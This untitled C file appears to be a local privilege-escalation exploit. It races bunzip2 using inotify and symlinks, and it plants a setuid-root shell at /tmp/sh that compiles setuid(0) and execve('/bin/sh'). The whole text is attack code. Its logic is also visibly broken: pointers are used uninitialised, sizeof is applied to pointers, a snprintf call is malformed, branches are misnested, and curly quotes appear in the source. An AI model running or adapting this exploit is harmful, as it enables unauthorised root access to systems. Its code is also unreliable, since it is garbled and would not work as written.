Untitled

#define BZ “/usr/bin/bunzip2″
#ifdef BSIZ
#undef BSIZ
#define BSIZ 128
#endif

int shell(char *file)  {
char *s =
“#!/bin/bash\n”
“echo ‘main(){setuid(0);execve(\”/bin/sh\”,0,0);}’>/tmp/sh.c\n”
“cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n”
“chmod 4755 /tmp/sh; rm -f ${0}; ${0##*/} $@\n”;
int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
write(fd, s, strlen(s));
close(fd);
return 0;
}

int main (int argc, char ** argv)  {
pid_t pid;
int fd, wd;
char *exec, *race, *path;
char buf[1], *evilsh = “/tmp/sh”, *trash = “/tmp/bla”;
if(argc != 3)  {
fprintf(stderr, “Use: %s <cmd>\n”, argv[0]);
return EX_USAGE;
}
pid = fork();
printf(“[+] initialize inotify\n”);
fd = inotify_init();
wd = inotify_add_watch(fd, exec, IN_CREATE);
if(pid == 0)  {
while(1)  {
exec = malloc(sizeof(argv[1]) + 6);
race = (char *)calloc(BSIZ, sizeof(char));
bzero(exec, sizeof(exec));
printf(“[+] creating target dir ..\n”);
mkdir(exec, S_IRWXU|S_IRWXG|S_IRWXO);
printf(“[+] Creating Shell in: (/tmp/sh) ..\n”);
shell(evilsh);
snprintf(exec, sizeof(exec), “/tmp/%s”, argv[1]);
system((char *)exec);
snprintf(exec, BSIZ, “ln -s %s /tmp/sh”, argv[1]);
system((char *)exec);
bzero(race, sizeof(race));
snprintf(race, BSIZ, “rm /tmp/sh”);
system((char *)race);
bzero(race, sizeof(race));
snprintf(race, BSIZ, “ln -fs /bin/sh /tmp/bla”);
system((char *)race);
bzero(race, sizeof(race));
snprintf(race, BSIZ, “rm /tmp/bla”);
system((char *)race);
sleep(2);
printf(“[-] failed\n”);
inotify_rm_watch(fd, wd);
if(pid > 0)
{
// failsafe :> (attak 2)
syscall(SYS_read, fd, buf, 1); /* we use syscalls… much easier.. this is if it fails remember… */
syscall(SYS_rename, exec,  trash);
syscall(SYS_rename, evilsh, exec);
while(1)
{
printf(“[+] opening root shell (/tmp/sh) ..\n”);
path = (char *)calloc(BSIZ/2, sizeof(char));
snprintf(path, sizeof(path), BSIZ/2, “%s /tmp/sh”, BZ);
system((char *)path);
}
}
}
}
}